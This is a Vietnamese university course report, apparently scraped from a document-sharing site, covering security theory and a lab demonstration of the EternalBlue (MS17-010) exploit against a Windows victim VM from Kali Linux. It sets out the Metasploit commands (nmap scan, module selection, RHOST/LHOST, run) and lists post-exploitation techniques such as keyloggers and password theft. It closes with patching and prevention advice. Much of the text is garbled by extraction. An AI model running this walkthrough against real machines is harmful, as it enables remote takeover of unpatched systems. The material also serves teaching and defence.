1. Trang chủ
  2. » Tất cả

Báo cáo môn học an toàn và bảo mật thông tin khai thác eternalblue trên windows 7 mã lỗi ms17 010

25 31 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 25
Dung lượng 3,23 MB

Nội dung

lOMoARcPSD|9242611 TRƯỜNG ĐẠI HỌC THỦ DẦU MỘT VIỆN KỸ THUẬT CƠNG NGHỆ BÁO CÁO MƠN HỌC AN TỒN VÀ BẢO MẬT THÔNG TIN KHAI THÁC ETERNALBLUE TRÊN WINDOWS MÃ LỖI MS17-010 GVGD:Ths Lê Từ Minh Trí NHĨM SVTH: Đỗ Duy Khánh - MSV: 21D4802010004 Đặng Xuân Ngọc - MSV: 21D4802010017 Nguyễn Hồng Tơ Ny - MSV: 21D4802010020 LỚP: K212LD.CNTT01 Bình Dương ,Tháng 06/2022 lOMoARcPSD|9242611 MỤC LỤC LỜI NĨI ĐẦU CHƯƠNG 1: TỔNG QUAN 1.1.Tổng quan vấn đề nghiên cứu 1.2.Nhiệm vụ đồ án CHƯƠNG 2: CƠ SỞ LÝ THUYẾT .3 2.1 An tồn thơng tin Việt Nam .3 2.2.Khái niệm bảo mật 2.2.1An tồn thơng tin 2.2.2Khái niệm lỗ hổng bảo mật 2.2.3Giới thiệu hệ điều hành windows 2.3Các lỗ hỗng bảo mật windows 2.4Giới thiệu hệ điều hành kali linux 2.4.1Hệ điều hành kali linux 2.4.2Các công cụ bảo mật kali linux Information Gathering – NmapVulnerability Analysis - Nikto CHƯƠNG 3: KẾT QUẢ THỰC NGHIỆM 3.1EternalBlue 3.2Công cụ công Metasploit 3.3Một số kỹ thuật công 10 3.4Demo khai thác lỗ hổng 10 3.5 Các bước tiến hành sau: 11 3.6Cách phòng chống 18 3.7Các nguyên nhân gây thông tin .18 3.8Hậu việc an tồn thơng tin 19 3.9Một số giải pháp 19 lOMoARcPSD|9242611 LỜI NĨI ĐẦU Bảo mật thơng tin ln ln vấn đề đặt lên hàng đầu với thời đại 4.0 Các trang mạng hệ điều hành miếng mồi ngon cho hacker xâm nhập để đánh cắp thông tin khách hàng Chúng sử dụng lỗ hổng hệ diều hành để xâm nhập bất hợp pháp vào máy tính bạn cài vào số phần mềm chiếm quyền điều hành máy tính bạn nhằm phá hoại đánh cắp thơng tin bảo mật máy tinh cá nhân bạn nhằm phịng tránh việc ăn cắp thơng tin chun gia bảo mật phát minh hệ điều hành kali linux Kali Linux sử dụng máy ảo để thưc hành kiểm tra bảo mật nhằm đánh giá an toàn hệ thống với hàng trăm công cụ bảo mật thâm nhập tốt Kali Linux phấn phối phát triển Offensive Security tổ chức phát hành vào tháng năm 2013, thay cho hệ điều hành Back Track Kali Linux xem biện pháp tiện lợi , tất có kali linux chuẩn bị phân loại, thu thập cập nhật công cụ hệ điều hành kali linux công việc việc đặt mục tiêu kiểm tra hệ thống Với mục tiêu tìm hiểu khai thác lỗ hổng hệ điều hành windows 10 Education đồng thời để học tập thêm kinh nghiệm nghiên cứu hệ điều hành Kali Linux nên em chọn đề tài để thực lOMoARcPSD|9242611 CHƯƠNG 1: TỔNG QUAN 1.1 Tổng quan vấn đề nghiên cứu Nghiên cứu cách sử dụng ứng tảng công nghệ thông tin để tìm thơng tin bảo mật , cách quản lý , khai thác hệ thống windows Nghiên cứu hệ điều hành kali linux Nghiên cứu công cụ khai thác lỗ hổng Khảo sát thực trạng Ưu điểm: Các công cụ Windows nhanh Các ứng dụng không bị nghẽn phải chờ nạp từ hệ thống Quản lý I / O đĩa cứng tốt, nhớ sử dụng hiệu Khởi động, tắt máy chế độ ngủ thực nhanh chóng Nhược điểm: Windows Firewall: Windows khoản thời gian không ngắn để tiến hành sáp nhập tường lửa với hệ điều hành, kết đời Windows Firewall Tuy nhiên, tiếc, tường lửa mặc định Windows chưa đánh giá cao, khơng cung cấp những tính mạnh mẽ để lọc dữ liệu chuyển qua kết nối Internet, ngăn chặn cơng từ bên ngồi… Ẩn dấu định dạng file: Mặc định, Microsoft vẫn tiếp tục dấu định dạng file quen thuộc biết đến, nghĩa file có tên đầy đủ “dantri.jpg” Windows hiển thị “dantri” Chế độ giả lập XP: Đây chế độ giả lập, cho phép sử dụng thiết bị phần cứng phần mềm chưa tương thích khơng hoạt động Windows Các thiết bị phần mềm hoạt động bình thường ổn định mơi trường Windows XP giả lập User Account Control (UAC): Từng bị xem tính “thừa” đưa vào Windows Vista Mục đích để người dùng dễ dàng quản lí khơng bị virus tự động kích hoạt hay qua mặt, với phần lớn người dùng, UAC bị xem phiền nhiễu, không giữ nguyên tính để sử dụng 1.2 Nhiệm vụ đồ án Tìm hiểu lỗi bảo mật windows Tìm hiểu hệ điều hành kali linux Tìm hiểu cơng cụ hỗ trợ bảo mật Tìm hiêu kỹ thuật cơng lOMoARcPSD|9242611 CHƯƠNG 2: CƠ SỞ LÝ THUYẾT 2.1 An tồn thơng tin Việt Nam Những năm gần đây, xu cách mạng công nghiệp 4.0, cùng với việc CNTT ứng dụng ngày sâu rộng vào mặt đời sống, chuyên gia có chung nhận định, tình hình an tồn thơng tin mạng giới nói chung Việt Nam nói riêng ngày diễn biến phức tạp Khơng nằm ngồi xu chung tồn cầu, cơng tác đảm bảo an tồn thơng tin mạng quan, tổ chức, doanh nghiệp Việt Nam phải đối mặt với nhiều thách thức, công mạng vào hệ thống thông tin gia tăng mạnh mẽ quy mô mức độ phức tạp, tinh vi, khó dự đốn Hệ thống thơng tin Việt Nam cịn tồn nhiều điểm yếu, lỗ hổng bảo mật dễ bị khai thác, cơng, xâm nhập; tình trạng lộ, bí mật nhà nước qua hệ thống thông tin gia tăng đột biến; tượng khai thác, sử dụng trái phép sở dữ liệu, tài nguyên thông tin quốc gia, dữ liệu cá nhân người dùng diễn biến phức tạp; xuất nhiều dịch vụ mới, đại gây khó khăn cho cơng tác quản lý, kiểm sốt quan chức Từ 2001 đến 2019, quan chức phát 1.100 vụ lộ, bí mật nhà nước, lộ, bí mật nhà nước qua hệ thống thông tin chiếm tỷ lệ lớn với 80% số vụ Tháng 3/2018, Facebook để lộ dữ liệu cá nhân để nhà phát triển bán lại cho Công ty Cambridge Analityca, dẫn tới 87 triệu dữ liệu thông tin người dùng bị lộ, có 427.466 tài khoản người dùng Việt Nam 2.2 Khái niệm bảo mật 2.2.1 An tồn thơng tin An tồn thơng tin hiểu hành động nhằm phòng ngừa, ngăn chặn ngăn cản truy cập, sử dụng, chia sẻ thông tin, tiết lộ, phát tán, phá hủy ghi lại những thông tin chưa cho phép chủ sở hữu An tồn thơng tin ngày coi vấn đề đáng lưu tâm hàng đầu xã hội Nó vấn đề ảnh hưởng đến ngành kinh tế, khoa học – kỹ thuật xã hội 2.2.2 Khái niệm lỗ hổng bảo mật Lỗ hổng bảo mật (tiếng Anh: vulnerability) khái niệm phổ biến giới an tồn thơng tin Có nhiều định nghĩa khác lỗ hổng, tất có điểm chung ám điểm yếu (kỹ thuật phi kỹ thuật) phần mềm, phần cứng, giao thức, hay hệ thống thông tin lOMoARcPSD|9242611 Nguyên nhân: • Độ phức tạp: Các hệ thống phức tạp làm tăng xác suất lỗ hổng, sai sót cấu hình truy cập ngồi ý muốn • Tính phổ biến: Các loại mã, phần mềm, hệ điều hành phần cứng có tính phổ biến làm tăng khả kẻ cơng tìm thấy có thơng tin lỗ hổng biết • Mức độ kết nối: Thiết bị kết nối nhiều khả xuất lỗ hổng cao • Quản lý mật kém: Những mật yếu bị phá cơng brute-force việc sử dụng lại mật dẫn đến từ vi phạm dữ liệu trở thành nhiều vụ vi phạm xảy • Lỗi hệ điều hành: Giống phần mềm khác, hệ điều hành có lỗ hổng Các hệ điều hành khơng an tồn – chạy mặc định để tất người dùng có quyền truy cập đầy đủ cho phép vi-rút phần mềm độc hại thực thi lệnh • Việc sử dụng Internet: Internet có nhiều loại phần mềm gián điệp phần mềm quảng cáo cài đặt tự động máy tính • Lỗi phần mềm: Lập trình viên vơ tình cố ý để lại lỗi khai thác phần mềm • Đầu vào người dùng khơng kiểm tra: Nếu trang web phần mềm cho tất đầu vào an tồn, chúng thực thi lệnh SQL ngồi ý muốn • Con người: Lỗ hổng lớn tổ chức người đằng sau hệ thống Tấn cơng phi kỹ thuật (social engineering) mối đe dọa lớn đa số tổ chức Có ba loại lỗ hổng bảo mật: • Lỗ hổng loại C: cho phép thực công kiểu DoS (Denial of Services – từ chối dịch vụ) làm ảnh hướng tới chất lượng dịch vụ, ngưng trệ, gián đoạn hệ thống, không phá hỏng dữ liệu đạt quyền truy cập hệ thống • Lỗ hổng loại B: lỗ hổng cho phép người sử dụng có thêm quyền truy cập hệ thống mà khơng cần kiểm tra tính hợp lệ dẫn đến lộ, lọt thơng tin • Lỗ hổng loại A: cho phép người ngồi hệ thống truy cập bất hợp pháp vào hệ thống, phá hủy toàn hệ thống lOMoARcPSD|9242611 2.2.3 Giới thiệu hệ điều hành windows Windows đời với dự định trở thành nâng cấp lớn cho hệ điều hành Windows Vista ngày trở nên lỗi thời trì khả tương thích phần cứng phần mềm Windows tiếp tục cải tiến Windows Aero (giao diện người dùng giới thiệu Windows Vista) với bổ sung tác vụ thiết kế lại cho phép ứng dụng “gắn” vào nó, tính quản lý cửa sổ Những tính khác thêm vào hệ điều hành, bao gồm thư viện, HomeGroup hệ thống chia sẻ file mới, hỗ trợ cho đầu vào cảm ứng đa điểm Một giao diện “Action Center” bổ sung để cung cấp nhìn tổng quan thơng tin bảo mật hệ thống bảo trì, điều chỉnh thực cho hệ thống User Account Control để làm tăng tính bảo mật cho chúng Ngược lại với Windows Vista, Windows nhà phê bình đánh giá cao, coi hệ điều hành với cải tiến đáng kể so với người tiền nhiệm hiệu suất tăng lên, giao diện trực quan (đặc biệt tác vụ mới), có người dùng popup Account Control, cải tiến khác làm tảng Windows thành cơng lớn Microsoft; chí trước phát hành thức, bán hàng đặt hàng trước cho nhà bán lẻ trực tuyến Amazon.com vượt qua kỷ lục trước Chỉ sáu tháng, 100 triệu bán toàn giới, tăng lên 630 triệu quyền vào tháng Bảy năm 2012, thị phần 49,05% “hệ điều hành lOMoARcPSD|9242611 máy tính để bàn” tháng năm 2016 Theo Net Applications, làm phiên sử dụng rộng rãi Windows 2.3 Các lỗ hỗng bảo mật windows Cục An tồn thơng tin, Bộ TT&TT vừa có cảnh báo đơn vị chuyên trách CNTT bộ/ngành, Sở TT&TT, tập đồn, tổng cơng ty nhà nước cùng ngân hàng, tổ chức tài hệ thống đơn vị chun trách an tồn thơng tin (gọi chung quan, đơn vị) số lỗ hổng bảo mật ảnh hưởng cao nghiêm trọng sản phẩm Microsoft Theo Cục An tồn thơng tin, ngày 10/11, Microsoft phát hành danh sách vá tháng 11 với 55 lỗ hổng bảo mật sản phẩm Các quan, đơn vị cần đặc biệt ý đến lỗ hổng bảo mật gồm CVE-2021-42321, CVE-2021-38631, CVE-2021-41371, CVE-2021-42292, CVE-2021-26443, CVE-2021-43208 CVE2021-43209 Chuyên gia Trung tâm Giám sát an tồn khơng gian mạng quốc gia (NCSC) thuộc Cục An tồn thơng tin phân tích: Khơng giống lỗ hổng zero-day liên quan đến vụ công hàng loạt hệ thống Exchange Server vào đầu năm nay, để khai thác lỗ hổng CVE-2021-42321, kẻ công cần xác thực vào hệ thống mục tiêu Tuy vậy, Microsoft Exchange Server mục tiêu ưu thích nhóm cơng mạng Do đó, quan, đơn vị cần có kế hoạch cập nhập sớm những hệ thống bị ảnh hưởng lOMoARcPSD|9242611 Hai lỗ hổng bảo mật CVE-2021-38631, CVE-2021-41371 Microsoft Remote Desktop Protocol (RDP) NCSC lưu ý Ảnh hưởng đến Windows đến Windows 11 Windows Server 2008 - 2019, cho phép đối tượng cơng thu thập thơng tin mật RDP hệ thống dễ bị công Lỗ hổng bảo mật CVE-2021-42292 Microsoft Excel ảnh hưởng đến Microsoft Excel phiên 2013-2021, cho phép đối tượng công cài cắm mã độc cách lợi dụng người dùng mở tệp Excel độc hại Lỗ hổng bảo mật CVE-2021-26443 Microsoft Virtual Machine Bus (VMBus) cho phép đối tượng công thực thi mã từ xa Với CVE-2021-43208 CVE-2021-43209 3D Viewer, hai lỗ hổng cho phép đối tượng công thực thi mã từ xa 2.4 Giới thiệu hệ điều hành kali linux 2.4.1 Hệ điều hành kali linux Kali Linux phân phối Linux phát triển trì Offensive Security tổ chức phát hành vào tháng năm 2013, thay phát triển cho hệ điều hành BackTrack Offensive Security tổ chức tiếng đáng tin cậy giới bảo mật, chí chứng nhận chuyên gia bảo mật với số chứng xem trọng có như: OSCP, OSCE, OSWP, OSEE Kali Linux hệ điều hành sử dụng nhiều lĩnh vực bảo mật, những hacker tìm cách xâm nhập hệ thống những chuyên gia bảo mật muốn bảo vệ tài nguyên thông tin Kali Linux cung cấp nhiều công cụ cho những tác vụ liên quan đến bảo mật 2.4.2 Các công cụ bảo mật kali linux Information Gathering – Nmap Đâu tiên Nmap - công cụ thiếu trình phân tích tìm kiếm thơng tin mục tiêu Các tính mà Nmap mang lại như: • Kiểm tra lập sơ đồ mạng: bao gồm máy chủ, định tuyến cách chúng kết nối • Tạo lưu lượng (traffic) đến host mạng, phân tích phản hồi đo thời gian phản hồi • Dị tìm dịch vụ (Service discovery) • Kiểm tra bảo mật khai thác lỗ hổng hệ thống mạng Vulnerability Analysis - Nikto lOMoARcPSD|9242611 Nikto công cụ rà quét lỗ hổng bảo mật nhằm tìm điểm yếu máy chủ web bạn sử dụng với máy chủ web (Apache, Nginx, IHS, OHS, Litespeed, v.v.) Nó có khả quét 6700 mục để phát cấu hình sai, tệp có nguy cơ, v.v số tính bao gồm: • Quét nhiều cổng máy chủ • Tìm miền phụ • Liệt kê người dùng Apache • Kiểm tra phiên lỗi thời • Hỗ trợ SSL • Lưu báo cáo dạng HTML, XML, CSV Web Application Analysis – WPScan WPScan black box vulnerability scanner cho WordPress viết PHP chủ yếu tập trung vào loại lỗ hổng khác WordPress, WordPress themes, plugins WPScan sử dụng sở dữ liệu tất plugin theme có sẵn (khoảng 18000 plugins 2600 themes) trình kiểm tra nhằm tìm phiên lỗi thời lỗ hổng bảo mật Database Assetment – Sqlmap Nhắc đến khai thác database khơng thể khơng nhắc tới SQLmap - công cụ mạnh việc khai thác lỗ hổng SQL injection Trải qua nhiều phiên SQLmap ngày hồn thiện có nhiều tính đa dạng Social Engineering Attack Tool – Zphisher Về cơng cụ khai thác Social Engineering có series viết khai thác SEToolkit, bạn tìm đọc Cịn sau giới thiệu cho bạn đọc cơng cụ khác thú vị để khai thác Social Engineering Zphisher lOMoARcPSD|9242611 CHƯƠNG 3: KẾT QUẢ THỰC NGHIỆM 3.1 EternalBlue EternalBlue, cách điệu thành ETERNALBLUE, khai thác thơng tin để có phát triển Cục An ninh Quốc gia Hoa Kỳ (NSA) Nó bị rị rỉ những nhóm hacker The Shadow Brokers vào ngày 14 tháng năm 2017, sử dụng phần Vụ cơng WannaCry tồn giới vào ngày 12 tháng năm 2017 EternalBlue khai thác lỗ hổng việc triển khai thực giao thức SMB (Server Message Block) Microsoft Lỗ hổng biểu thị mục CVE2017-0144 mục Danh mục Khiếm ẩn Chung Phơi nhiễm (CVE) Các lỗ hổng tồn máy chủ SMBv1 phiên khác Microsoft Windows chấp nhận gói dữ liệu đặc biệt tạo những kẻ công từ xa, cho phép họ thực thi mã tùy ý máy tính mục tiêu 3.2 Cơng cụ cơng Metasploit Metasploit Framework môi trường dùng để kiểm tra, công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với những component viết C, assembler, Python Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS Cách sử dụng công cụ: Bước 1: Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác • show exploits: Xem module exploit mà framework có hỗ trợ • use exploit_name: Chọn module exploit • info exploit_name: Xem thông tin module exploit Bạn nên cập nhật thường xuyên lỗi dịch vụ metasploit.com qua script msfupdate.bat Bước 2:Cấu hình module exploit chọn: • show options: Xác định những options cần cấu hình • set: Cấu hình cho những option module Một vài module cịn có những advanced options, bạn xem cách gõ dòng lệnh show advanceds lOMoARcPSD|9242611 Bước 3:Xác nhận những option vừa cấu hình: • check: Kiểm tra xem những option set xác chưa Lựa chọn mục tiêu: Lựa chọn hệ diều hành muốn thực • show targets: những target cung cấp module • set: xác định target Ví dụ: smf>usewindows_ssl_pct show targets Exploit liệt kê những target như: winxp, winxp SP1, win2000, win2000 SP1 Bước 4: Lựa chọn payload: Payload đoạn code mà chạy hệ thống máy tính điều khiển từ xa • show payloads: Liệt kê những payload module exploit • info payload_name: Xem thơng tin chi tiết payload • set PAYLOAD payload_name: Xác định payload module name.Sau lựa chọn payload nào, dùng lệnh show option để xem những option payload • show advanced: Xem những advanced option payload Bước 5:Thực thi exploit: • exploit: Lệnh dùng để thực thi payload code Payload sau cung cấp cho bạn những thông tin hệ thống khai thác 3.3 Một số kỹ thuật công - Kĩ thuật thả keylogger với metasploit - Kĩ thuật thâm nhập máy khác backdoor - Kĩ thuật đánh cắp file từ máy khác sử dụng metasploit - Kĩ thuât đánh cắp password login windows metasploit số kĩ thuật công khác 3.4 Demo khai thác lỗ hổng Chuẩn bị hai máy : Một máy hệ điều hành kali linux máy attacker Máy hệ điều hành windows victim 10 lOMoARcPSD|9242611 Hình 3.4.1: Máy attacker máy victim Bước : sử dụng công cụ Nmap kali linux để quét lấy địa IP sử dụng chung đường dây mạng Xác định IP máy victim Bước 2: sau lấy địa IP , khởi động công cụ msfconsole Bước 3: kiểm tra lỗi lấy thông tin sau xác định lỗi lỗ hổng để cơng Bước 4: thử kiểm tra quyền kiểm soát victim sau cài đặt cập nhật để chơng cơng 3.5 Các bước tiến hành sau: Bước 1: Cài đặt kali linux windows phần mềm Oracle VM VirtualBox Máy windows máy victim Bước 2: lấy địa IP máy victim o Mở terminal nhập lệnh Root@kali:~# ifconfig //xác định địa đường dây mạng Root@kali: ~# Nmap –A 192.168.1.0/24 //câu lệnh để quét máy cùng sử dụng chung đường dây mạng Root@kali: ~# ping 192.168.2.5 // kiểm tra kết nối 11 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.1: Xác định địa Root@kali: ~# msfconsole Khởi động cơng cụ msfconsole Hình 3.5.2: Quá trình khởi động o Tìm kiếm lỗi Msf5 > search ms17-010 12 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.3: Xác định lỗi o Sử dụng lỗi để cơng Msf5 > use exploit/windows/smb/ms17_010_eternalblue Hình 3.5.4: Giao diện sử dụng lỗi o Show post Msf5 exploit (windows/smb/ms17_010_eternalblue) > 13 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.5: Giao diện options o Set địa ip máy victim Msf5 exploit (windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.5 Hình 3.5.6: Giao diện set địa o Show payloads Msf5 exploit (windows/smb/ms17_010_eternalblue) > show payloads 14 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.6: Giao diện show payloads Hình 3.5.7: Giao diện show payloads o Set payload Msf5 exploit (windows/smb/ms17_010_eternalblue) > set payload 15 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.8: Giao diện set payload Msf5 exploit (windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.8 Hình 3.5.9: Thực set IP o Show lại options thực chiếm quyền kiểm soát Msf5 exploit (windows/smb/ms17_010_eternalblue) > show options Msf5 exploit (windows/smb/ms17_010_eternalblue) > run 16 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.10: Giao diện show options 17 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.11: Giao diện cơng 3.6 Cách phòng chống Cách phòng chống hiệu phải thường xuyên cập nhật phiên để sữa lỗi nhà phát hành tìm sữa lỗi cho hệ diều hành Trong cập nhật bảo mật Windows tiêu chuẩn vào ngày 14 tháng năm 2017 giải vấn đề thông qua cập nhật bảo mật MS17-010 cho tất phiên Windows hỗ trợ thời điểm Windows Vista,Windows 7, 8.1, Windows 10, Windows Server 2008, Windows Server 2012, Windows Server 2016 3.7 Các ngun nhân gây thơng tin • Nhận thức :Ngun nhân có lẽ nguyên nhân dẫn tới cố ATTT tăng cao Thậm chí số trường hợp, Hacker khơng cần dùng tới công cụ hay phần mềm công nạn nhân vẫn bị lừa đảo • Khơng phân quyền rõ ràng: Một những nguyên nhân làm thông tin dữ liệu người quản trị khơng phân quyền rõ ràng cho thành viên Lợi dụng điều này, nhân viên nội đánh cắp, tráo đổi, thay đổi thơng tin cơng ty • Lỗ hổng tồn thiết bị: Thực tế rằng, nhiều người dùng tải cài đặt phần mềm mới, ứng dụng cho điện thoại, laptop, PC… mà không tự hỏi “Liệu phần mềm có chứa lỗ hổng hay khơng” Trong đó, phần mềm ứng dụng ln tồn những lổ hổng bảo mật nguy cơng 18 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 • Lỗ hổng hệ thống: Hệ thống hệ thống website, hệ thống mạng, hệ thống ứng dụng, thiết bị, phần mềm Nguyên nhân làm an tồn thơng tin trường hợp đơn vị không thường xuyên rà quét lỗ hổng, đánh giá bảo mật cho hệ thống dẫn tới những nguy thiệt hại tài to lớn 3.8 Hậu việc an tồn thơng tin Ngồi số thiệt hại an tồn thơng tin SecurityBox vừa điểm trên, Doanh nghiệp cịn bị thiệt hại to lớn tài có cố Mặt khác, thương hiệu cơng ty bị ảnh hưởng, làm lịng tin với kháchhàng Điển ngành ngân hàng, tài thương mại điện tử, thông tin khách hàng bị lộ lọt tin tặc lợi dung khai thác triệt để 3.9 Một số giải pháp o Đặt mật mạnh: Đảm bảo tài khoản mạng xã hội, website, ứng dụng bạn cần đặt mật mạnh Mật nên chứa dấu gạch @, số, ký tự chữ Cá nhân nên tránh đặt những mật dễ 123456, 123456789, tên + ngày sinh,… o Mã hóa dữ liệu :Đối với những thông tin quan trọng, mật thiết, nên mã hóa trước gửi đi.Mục đích việc mã hóa thơng tin tránh khỏi nhịm ngó, cơng Hacker o Cập nhật phần mềm : Một những giải pháp tránh thông tin hiệu cài đặt phần mềm Bạn cài phần mềm diệt virus, phần mềm cảnh báo công, phần mềm giám sát hệ thống o Cài đặt phần mềm diệt virus : Cài đặt phần mềm chống virus xâm nhập giải pháp chuyên gia khuyến cáo Lưu ý, người dùng nên quét virus trước tải phần mềm máy Một số công cụ online giúp kiểm tra mã độc online như: virus total, 6scan security, sitecheck o Sử dụng phần mềm có nguồn gốc rõ ràng :Đảm bảo phần mềm, ứng dụng thiết bị bạn có nguồn gốc rõ ràng giúp hạn chế nguy làm attt o Kiểm soát quyền thiết bị :Hãy phân chia quyền thật rõ ràng cho thành viên, người thân thiết bị bạn o Tắt kết nối Wifi, Bluetooth, NFC không sử dụng: Hãy nhớ sau vào mạng, bạn phải tắt kết nối Wifi, bluetooth, NFC để tránh nguy bị rò rỉ mật khẩu, tài liệu thông tin cá nhân 19 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Downloaded by tran quang (quangsuphamhoak35@gmail.com) ... tìm sữa lỗi cho hệ diều hành Trong cập nhật bảo mật Windows tiêu chuẩn vào ngày 14 tháng năm 20 17 giải vấn đề thông qua cập nhật bảo mật MS 17- 010 cho tất phiên Windows hỗ trợ thời điểm Windows. .. quyền kiểm soát Msf5 exploit (windows/ smb/ms 17_ 010 _eternalblue) > show options Msf5 exploit (windows/ smb/ms 17_ 010 _eternalblue) > run 16 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611... > search ms 17- 010 12 Downloaded by tran quang (quangsuphamhoak35@gmail.com) lOMoARcPSD|9242611 Hình 3.5.3: Xác định lỗi o Sử dụng lỗi để công Msf5 > use exploit /windows/ smb/ms 17_ 010_ eternalblue

Ngày đăng: 30/01/2023, 17:40

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w